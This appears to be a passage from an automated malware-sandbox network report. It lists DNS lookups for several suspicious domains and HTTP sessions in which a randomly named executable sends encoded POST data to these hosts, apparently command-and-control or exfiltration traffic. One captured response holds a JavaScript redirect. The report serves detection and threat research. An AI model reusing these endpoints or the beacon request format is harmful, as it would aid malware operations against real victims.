Nov 18, 2024 03:23:55.291973114 CET	56665	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:23:55.311762094 CET	53	56665	1.1.1.1	192.168.2.4
Nov 18, 2024 03:24:08.606964111 CET	64461	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:24:08.643959999 CET	53	64461	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 03:22:56.861943960 CET	192.168.2.4	1.1.1.1	0xfddc	Standard query (0)	www.huiguang.xyz	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:22:57.849168062 CET	192.168.2.4	1.1.1.1	0xfddc	Standard query (0)	www.huiguang.xyz	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:14.286295891 CET	192.168.2.4	1.1.1.1	0xd6e3	Standard query (0)	www.beingandbecoming.ltd	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:27.673558950 CET	192.168.2.4	1.1.1.1	0xe8e9	Standard query (0)	www.futurevision.life	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:41.276576042 CET	192.168.2.4	1.1.1.1	0x6523	Standard query (0)	www.schedulemassage.xyz	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:55.291973114 CET	192.168.2.4	1.1.1.1	0xabae	Standard query (0)	www.mcfunding.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:24:08.606964111 CET	192.168.2.4	1.1.1.1	0x604f	Standard query (0)	www.migorengya8.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 03:22:58.083297014 CET	1.1.1.1	192.168.2.4	0xfddc	No error (0)	www.huiguang.xyz		154.92.61.37	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:22:58.083353996 CET	1.1.1.1	192.168.2.4	0xfddc	No error (0)	www.huiguang.xyz		154.92.61.37	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:14.309788942 CET	1.1.1.1	192.168.2.4	0xd6e3	No error (0)	www.beingandbecoming.ltd	beingandbecoming.ltd		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 03:23:14.309788942 CET	1.1.1.1	192.168.2.4	0xd6e3	No error (0)	beingandbecoming.ltd		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:14.309788942 CET	1.1.1.1	192.168.2.4	0xd6e3	No error (0)	beingandbecoming.ltd		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:27.834372997 CET	1.1.1.1	192.168.2.4	0xe8e9	No error (0)	www.futurevision.life		203.161.49.193	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:41.491919994 CET	1.1.1.1	192.168.2.4	0x6523	No error (0)	www.schedulemassage.xyz	schedulemassage.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 03:23:41.491919994 CET	1.1.1.1	192.168.2.4	0x6523	No error (0)	schedulemassage.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:41.491919994 CET	1.1.1.1	192.168.2.4	0x6523	No error (0)	schedulemassage.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:55.311762094 CET	1.1.1.1	192.168.2.4	0xabae	No error (0)	www.mcfunding.org	mcfunding.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 03:23:55.311762094 CET	1.1.1.1	192.168.2.4	0xabae	No error (0)	mcfunding.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:23:55.311762094 CET	1.1.1.1	192.168.2.4	0xabae	No error (0)	mcfunding.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 18, 2024 03:24:08.643959999 CET	1.1.1.1	192.168.2.4	0x604f	No error (0)	www.migorengya8.click	migorengya8.click		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 03:24:08.643959999 CET	1.1.1.1	192.168.2.4	0x604f	No error (0)	migorengya8.click		198.252.98.54	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.huiguang.xyz

www.beingandbecoming.ltd

www.futurevision.life

www.schedulemassage.xyz

www.mcfunding.org

www.migorengya8.click

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	154.92.61.37	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:22:58.117820024 CET	531	OUT	GET /hv6g/?p2J=sbJxX&XRWLl=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.huiguang.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:22:59.049093962 CET	835	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 18 Nov 2024 02:22:58 GMT Content-Type: text/html Content-Length: 609 Last-Modified: Wed, 13 Nov 2024 08:19:25 GMT Connection: close ETag: "6734610d-261" Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 37 34 66 38 32 66 63 36 35 39 65 35 61 63 64 38 61 39 35 38 62 62 66 38 39 30 34 31 64 31 66 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED] Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817/register'; }, 1000); // 1 }; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49829	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:14.326419115 CET	825	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d Data Ascii: XRWLl=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49844	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:16.868513107 CET	845	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 35 45 2f 5a 76 36 52 58 52 75 2f 31 72 39 54 57 50 2f 7a 50 6e 51 44 33 48 43 5a 44 7a 73 55 35 34 3d Data Ascii: XRWLl=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL75E/Zv6RXRu/1r9TWP/zPnQD3HCZDzsU54=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49856	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:19.458304882 CET	10927	OUT	POST /79tr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Origin: http://www.beingandbecoming.ltd Referer: http://www.beingandbecoming.ltd/79tr/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 2b 65 76 49 71 6c 59 68 72 33 45 49 32 42 37 7a 6a 4c 36 66 44 76 67 70 38 37 72 4f 57 6d 63 4a 6d 6a 54 44 66 2f 4f 79 4c 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 42 59 49 62 6b 38 65 55 66 4a 39 77 77 72 46 4d 5a 38 61 47 61 51 36 6f 37 42 79 6b 67 2b 4d 74 6b 6d 53 71 4c 2b 6b 31 2b 4f 44 52 2b 43 53 4f 67 76 76 71 48 58 57 4c 69 2b 70 71 36 39 50 56 73 44 2f 74 48 73 33 6d 62 70 41 39 59 43 65 4b 4f [TRUNCATED] Data Ascii: XRWLl=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupqBzgRzq+evIqlYhr3EI2B7zjL6fDvgp87rOWmcJmjTDf/OyLnMe13Lh2t2GtZcapMV5z0sIjcS0nED4SkBYIbk8eUfJ9wwrFMZ8aGaQ6o7Bykg+MtkmSqL+k1+ODR+CSOgvvqHXWLi+pq69PVsD/tHs3mbpA9YCeKOr+qU5SRTUqofRc/uBxZgyybUf6E4V/aHG5QbsIu9YaK99lyu0CKm7uASLa7LDeiW/RYhRYFz3JRXCiTj9Ef6aP/71BaHIzNBaBV2ArDLuyrT3JwbxIMi3UAFntiIkGRf3jybTxc7/3HTg6kfj65W15qsQMZrR8ceoksUx3a3RuQ5boWDCvnIi8q1WGhsFJXyyzz0UIVWLOoJhbBusdzqmeu22TdZ1p+8MP19aiAI+RcfITlzHu611Ud6T1oxElPqRFmkG/XKFjHxlqtiq0+FRFGsLMIBcL+GG9rG/6ewoUJU3MJ+43eGJow46P5oyeYHS24dHl31xclUA0+N4JFhm32VCPb4buPiJvi/CpwAmrYPEQdauGMh7u+YDOHqGQCxoET3td8/kjPGai2//RasEWvKIHJx2bdU2jL4gCNmW1gPneYqmmswoxq/V9BD/dpMd6EInt7KL3ld8zUjwrnFgRLBGLKWG8lXUPgQ7vlcTJFtx/dp5dqSe0EeOj8/+MuAWTWP5i74FZPo+KtSQMNHgnO1ikhZuzlc7h1v/2beX4AwRAePu0CN+3tDCb1kIFIZeyOw4+cTL0CIvyYyYjnNVdagEWS22m1QZdWwRnbF46wXRJ0E9xbNEVY39Nkv93F6BvIeZpEjI/kavKKB4rWPq1utiGZv0K8oDc [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49871	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:22.023060083 CET	539	OUT	GET /79tr/?XRWLl=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&p2J=sbJxX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.beingandbecoming.ltd Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:23:22.652698994 CET	391	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 18 Nov 2024 02:23:22 GMT Content-Type: text/html Content-Length: 251 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 52 57 4c 6c 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 33 57 48 7a 38 66 48 61 49 56 49 52 61 37 6a 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 38 41 45 2f 4d 7a 41 4e 55 4b 76 4d 56 6b 4f 71 4b 37 76 43 79 38 59 72 34 62 6a 32 71 6d 4d 48 4c 6b 51 3d 26 70 32 4a 3d 73 62 4a 78 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XRWLl=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&p2J=sbJxX"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49905	203.161.49.193	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:27.854455948 CET	816	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 57 42 31 35 55 47 71 59 41 6e 6a 6d 6e 66 45 31 2b 4d 71 61 43 4d 52 36 30 41 4c 74 35 52 43 65 51 3d 3d Data Ascii: XRWLl=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRWB15UGqYAnjmnfE1+MqaCMR60ALt5RCeQ==
Nov 18, 2024 03:23:28.570615053 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 02:23:28 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49919	203.161.49.193	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:23:30.398582935 CET	836	OUT	POST /hxmz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Origin: http://www.futurevision.life Referer: http://www.futurevision.life/hxmz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 6f 69 6e 7a 4a 2f 67 36 73 4c 46 62 51 6c 59 33 4b 42 73 73 53 70 64 79 69 4c 66 2b 2f 71 2b 70 51 3d Data Ascii: XRWLl=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICoinzJ/g6sLFbQlY3KBssSpdyiLf+/q+pQ=
Nov 18, 2024 03:23:31.104600906 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 02:23:31 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49935	203.161.49.193	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
